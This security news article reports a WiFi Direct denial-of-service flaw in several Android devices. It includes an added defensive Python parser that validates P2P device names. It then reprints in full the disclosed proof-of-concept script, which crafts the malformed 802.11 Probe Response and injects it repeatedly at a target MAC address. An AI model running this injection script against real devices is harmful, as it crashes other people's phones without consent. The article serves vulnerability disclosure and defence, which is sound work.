Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

Some Android devices are vulnerable to a denial of service (DoS) through a WiFi Direct vulnerability discovered by Andres Blanco of CoreLabs.

An attacker could send a specially crafted 802.11 Probe Response frame that causes the Dalvik subsystem to reboot because of an unhandled exception in the WifiMonitor class.

Vulnerable packages include:

- Nexus 5 – Android 4.4.4
- Nexus 4 – Android 4.4.4
- LG D806 – Android 4.2.2
- Samsung SM-T310 – Android 4.2.2
- Motorola RAZR HD – Android 4.1.2

Core Security disclosed the vulnerability on Seclists. The bug is in Android's modified wpa_supplicant, which provides the interface between the wireless driver and the Android platform.

If a probe response carries a device name attribute with specific bytes, the wpa_supplicant event string that Android builds from it is malformed, and Android’s WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.
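The defensive side of this bug, as an added example that is not part of the original article and not Android's or CoreLabs' code: a Python 3 parser that walks the Probe Response information elements, locates the P2P Device Info attribute and validates the WSC Device Name (length, strict UTF-8, no whitespace or control characters) before the value would ever be turned into a supplicant event string. The field layout follows the IEEE 802.11 and Wi-Fi P2P specifications; `make_probe_response` is a test-vector builder written for this example, and both sample frames are constructed here for illustration.

```python
"""Defensive parser for the P2P Device Info attribute in an 802.11 Probe Response.

Added example (not Android's or CoreLabs' code). Sample frames are constructed
below; the layout follows IEEE 802.11 / Wi-Fi P2P field order.
"""
import struct

P2P_OUI = b"\x50\x6F\x9A"
P2P_OUI_TYPE = 0x09
ATTR_DEVICE_INFO = 0x0D
WSC_ATTR_DEVICE_NAME = 0x1011
MAX_DEVICE_NAME = 32        # WSC Device Name attribute is at most 32 octets
MGMT_HEADER_LEN = 24        # FC, duration, addr1-3, sequence control
FIXED_PARAMS_LEN = 12       # timestamp(8), beacon interval(2), capabilities(2)


def iter_ies(body):
    """Yield (element_id, payload) per information element; reject truncation."""
    off = 0
    while off + 2 <= len(body):
        eid, ln = body[off], body[off + 1]
        off += 2
        if off + ln > len(body):
            raise ValueError("truncated information element")
        yield eid, body[off:off + ln]
        off += ln


def iter_p2p_attrs(payload):
    """Yield (attr_id, data): 1-byte id, 2-byte little-endian length."""
    off = 0
    while off + 3 <= len(payload):
        aid = payload[off]
        (ln,) = struct.unpack_from("<H", payload, off + 1)
        off += 3
        if off + ln > len(payload):
            raise ValueError("truncated P2P attribute")
        yield aid, payload[off:off + ln]
        off += ln


def parse_device_name(dev_info):
    """Extract and validate the WSC Device Name from a P2P Device Info body.

    Layout: address(6) | config methods(2) | primary device type(8)
            | secondary type count(1) | secondary types(8 each)
            | Device Name TLV: type(2) length(2) big-endian, then name bytes
    """
    if len(dev_info) < 17:
        raise ValueError("device info too short")
    off = 17 + 8 * dev_info[16]
    if off + 4 > len(dev_info):
        raise ValueError("device info missing device name TLV")
    attr_type, ln = struct.unpack_from(">HH", dev_info, off)
    if attr_type != WSC_ATTR_DEVICE_NAME:
        raise ValueError("unexpected WSC attribute 0x%04x" % attr_type)
    raw = dev_info[off + 4:off + 4 + ln]
    if len(raw) != ln:
        raise ValueError("device name length exceeds attribute")
    if ln > MAX_DEVICE_NAME:
        raise ValueError("device name too long")
    # Strict decode: bytes such as 0xFA 0xFA are not valid UTF-8 and are
    # rejected here instead of being pasted into an event string.
    try:
        name = raw.decode("utf-8")
    except UnicodeDecodeError:
        raise ValueError("device name is not valid UTF-8") from None
    if any(ch.isspace() or not ch.isprintable() for ch in name):
        raise ValueError("device name contains whitespace or control characters")
    return name


def device_name_from_probe_response(frame):
    """Return the P2P device name, or None if the frame carries no Device Info.

    Raises ValueError on any malformed field so the caller can drop the frame.
    """
    if len(frame) < MGMT_HEADER_LEN + FIXED_PARAMS_LEN:
        raise ValueError("frame too short")
    if frame[0] != 0x50:    # type = management, subtype = probe response
        raise ValueError("not a probe response")
    for eid, payload in iter_ies(frame[MGMT_HEADER_LEN + FIXED_PARAMS_LEN:]):
        if eid == 0xDD and payload[:4] == P2P_OUI + bytes([P2P_OUI_TYPE]):
            for aid, data in iter_p2p_attrs(payload[4:]):
                if aid == ATTR_DEVICE_INFO:
                    return parse_device_name(data)
    return None


def make_probe_response(name_bytes, src=b"\x00\x11\x22\x33\x44\x55", dst=b"\xff" * 6):
    """Constructed test vector: minimal Probe Response with a P2P Device Info attribute."""
    header = b"\x50\x00" + b"\x00\x00" + dst + src + src + b"\x00\x00"
    fixed = b"\x00" * 8 + struct.pack("<H", 100) + b"\x30\x04"
    ssid_ie = b"\x00" + bytes([7]) + b"DIRECT-"
    dev_info = (src + b"\x01\x88" + b"\x00\x0A\x00\x50\xF2\x04\x00\x05" + b"\x00"
                + struct.pack(">HH", WSC_ATTR_DEVICE_NAME, len(name_bytes)) + name_bytes)
    p2p_body = (b"\x02" + struct.pack("<H", 2) + b"\x21\x00"
                + bytes([ATTR_DEVICE_INFO]) + struct.pack("<H", len(dev_info)) + dev_info)
    p2p_payload = P2P_OUI + bytes([P2P_OUI_TYPE]) + p2p_body
    return header + fixed + ssid_ie + b"\xDD" + bytes([len(p2p_payload)]) + p2p_payload


GOOD_FRAME = make_probe_response(b"Nexus-5")          # constructed, well-formed name
BAD_FRAME = make_probe_response(b"fafa\xFA\xFA")      # constructed, name bytes from the article


def check_frame(frame):
    """Classify a frame as ('ok', name) or ('rejected', reason)."""
    try:
        return ("ok", device_name_from_probe_response(frame))
    except ValueError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for label, f in (("good", GOOD_FRAME), ("bad", BAD_FRAME)):
        print(label, check_frame(f))
```

Every length field is checked against the bytes actually present, so a truncated element or an over-long name is rejected with a `ValueError` rather than read past the buffer, and the name is validated as text before it reaches any string-based event parsing; that is the check the WifiP2pDevice path lacked.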

Here is the PoC from the Seclists post:

This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----
#!/usr/bin/env python
# Python 2 (print statements, str-based frames); PyLorcon2 is a Python 2 binding.
import sys
import time
import struct
import PyLorcon2


def get_probe_response(source, destination, channel):
    # Build a raw 802.11 Probe Response carrying a P2P vendor IE.
    frame = str()
    frame += "\x50\x00"  # Frame Control
    frame += "\x00\x00"  # Duration
    frame += destination
    frame += source
    frame += source
    frame += "\x00\x00"  # Sequence Control
    frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
    frame += "\x64\x00"  # Beacon Interval
    frame += "\x30\x04"  # Capabilities Information
    # SSID IE
    frame += "\x00"
    frame += "\x07"
    frame += "DIRECT-"
    # Supported Rates
    frame += "\x01"
    frame += "\x08"
    frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
    # DS Parameter Set
    frame += "\x03"
    frame += "\x01"
    frame += struct.pack("B", channel)
    # P2P vendor-specific IE (OUI 50:6F:9A, type 0x09)
    frame += "\xDD"
    frame += "\x27"
    frame += "\x50\x6F\x9A"
    frame += "\x09"
    # P2P Capabilities
    frame += "\x02"  # ID
    frame += "\x02\x00"  # Length
    frame += "\x21\x00"
    # P2P Device Info
    frame += "\x0D"  # ID
    frame += "\x1B\x00"  # Length
    frame += source
    frame += "\x01\x88"
    frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
    frame += "\x00"
    frame += "\x10\x11"  # WSC Device Name attribute
    frame += "\x00\x06"  # Length
    frame += "fafa\xFA\xFA"  # device name bytes that malform the supplicant event string
    return frame


def str_to_mac(address):
    return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage:"
        print "  poc.py  "
        print "Example:"
        print "  poc.py wlan0 00:11:22:33:44:55"
        sys.exit(-1)

    iface = sys.argv[1]
    destination = str_to_mac(sys.argv[2])

    context = PyLorcon2.Context(iface)
    context.open_injmon()

    channel = 1
    source = str_to_mac("00:11:22:33:44:55")
    frame = get_probe_response(source, destination, channel)

    print "Injecting PoC."
    for i in range(100):
        context.send_bytes(frame)
        time.sleep(0.100)
-----/